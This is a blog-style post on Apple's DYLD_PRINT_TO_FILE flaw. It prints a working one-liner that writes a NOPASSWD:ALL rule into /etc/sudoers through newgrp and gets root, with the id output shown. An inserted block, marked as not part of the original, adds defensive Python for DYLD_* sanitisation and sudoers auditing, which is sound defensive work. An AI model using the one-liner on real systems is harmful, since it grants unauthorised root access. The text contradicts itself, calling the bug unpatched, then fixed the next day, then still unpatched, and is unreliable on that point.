Apple’s DYLD_PRINT_TO_FILE vulnerability: from zero to root in 2 seconds

Several weeks ago, a vulnerability in Apple’s dynamic loader logging was discovered by Stefan Esser (known for his jailbreaks of iOS devices). At the time of writing it remained unpatched; Apple shipped a fix the very next day in OS X 10.10.5 (tracked as CVE-2015-3760) via improved environment sanitisation, so the exploit below no longer works on patched or modern macOS.

Once you have an ordinary user account on a Mac OS X system, getting a root account is trivially simple.

By default, sudo is protected by your account password.

$ sudo su -
Password:

However, if you abuse the DYLD_PRINT_TO_FILE vulnerability, you instantly get root.

$ id
uid=1390866408(mattias)

$ DYLD_PRINT_TO_FILE=/etc/sudoers newgrp <<< 'echo "$USER ALL=(ALL) NOPASSWD:ALL" >&3'; sudo -s

$ id
uid=0(root) gid=0(wheel)

A single one-liner that appends a NOPASSWD rule to /etc/sudoers, elevates your privileges and bypasses sudo’s password check altogether.
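Two defender-side checks that follow from the one-liner above, as an added Python example (not Apple’s dyld code, not Stefan Esser’s exploit, and not part of the original post). The first shows the shape of the environment sanitisation that the fix relies on: before a setuid or setgid program such as newgrp is launched, every DYLD_* variable is dropped, so an attacker cannot point dyld’s log output at a file the privileged process can write. The second is an integrity check over sudoers text that flags the exact kind of line the exploit appends. The function names and the sample sudoers text are constructed for illustration.

```python
"""Defender-side checks for the DYLD_PRINT_TO_FILE privilege escalation.

Illustrative code added for this post. It is not Apple's loader logic and
not the exploit; it demonstrates (1) stripping DYLD_* from the environment
of setuid/setgid programs and (2) auditing sudoers for NOPASSWD:ALL rules.
"""
import os
import re
import stat

# Matches an uncommented sudoers rule of the form
#   <who> <hosts> = (<runas>) ... NOPASSWD: ALL
# e.g. "mattias ALL=(ALL) NOPASSWD:ALL" as written by the one-liner.
NOPASSWD_RE = re.compile(
    r"^\s*(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*"
    r"(\([^)]*\)\s*)?.*\bNOPASSWD\s*:\s*ALL\b"
)


def sanitize_env_for_setuid(env, is_setuid):
    """Return a copy of env; for setuid/setgid targets drop every DYLD_* key.

    Constructed illustration of 'environment sanitisation': a loader must not
    act on attacker-controlled DYLD_* variables when the process runs with
    elevated privileges, otherwise DYLD_PRINT_TO_FILE lets the attacker make
    the privileged process open an arbitrary path for writing.
    """
    if not is_setuid:
        return dict(env)
    return {k: v for k, v in env.items() if not k.startswith("DYLD_")}


def find_nopasswd_entries(sudoers_text, allowed=()):
    """Return (line_no, line) for each NOPASSWD:ALL rule not in `allowed`.

    Comment lines and blank lines are ignored; `allowed` lists principals
    (users or %groups) that are legitimately permitted passwordless sudo.
    """
    hits = []
    for n, line in enumerate(sudoers_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = NOPASSWD_RE.match(line)
        if m and m.group("who") not in allowed:
            hits.append((n, stripped))
    return hits


def is_setuid_or_setgid(path):
    """True if the file at path carries the setuid or setgid bit."""
    st = os.stat(path)
    return bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


# Constructed sample sudoers content (not a real system file).
SAMPLE_SUDOERS = """\
# constructed sample sudoers, not from any real host
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
# mattias ALL=(ALL) NOPASSWD:ALL   <- commented out, must be ignored
mattias ALL=(ALL) NOPASSWD:ALL
"""


if __name__ == "__main__":
    # Audit the constructed sample, then the live sudoers file if readable.
    for path_or_text, label in ((SAMPLE_SUDOERS, "sample"),):
        for line_no, rule in find_nopasswd_entries(path_or_text):
            print(f"[{label}] line {line_no}: unexpected passwordless rule: {rule}")
    try:
        with open("/etc/sudoers") as fh:
            for line_no, rule in find_nopasswd_entries(fh.read()):
                print(f"[/etc/sudoers] line {line_no}: {rule}")
    except (FileNotFoundError, PermissionError) as exc:
        print(f"skipping /etc/sudoers: {exc}")

    # Show the sanitisation step on an environment like the exploit's.
    env = {"PATH": "/usr/bin:/bin", "DYLD_PRINT_TO_FILE": "/etc/sudoers"}
    print(sanitize_env_for_setuid(env, is_setuid=True))
```

Running the module prints the flagged sample line and the sanitised environment; on a host where /etc/sudoers is readable it also reports any passwordless rules found there. Both checks are cheap enough to run from a periodic integrity job, and a diff of sudoers against a known-good copy is the simpler detection for the specific change this exploit makes.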

It’s one thing that this happened. It’s software; we expect bugs. It’s quite another that this problem still isn’t patched after weeks of the exploit being publicly known.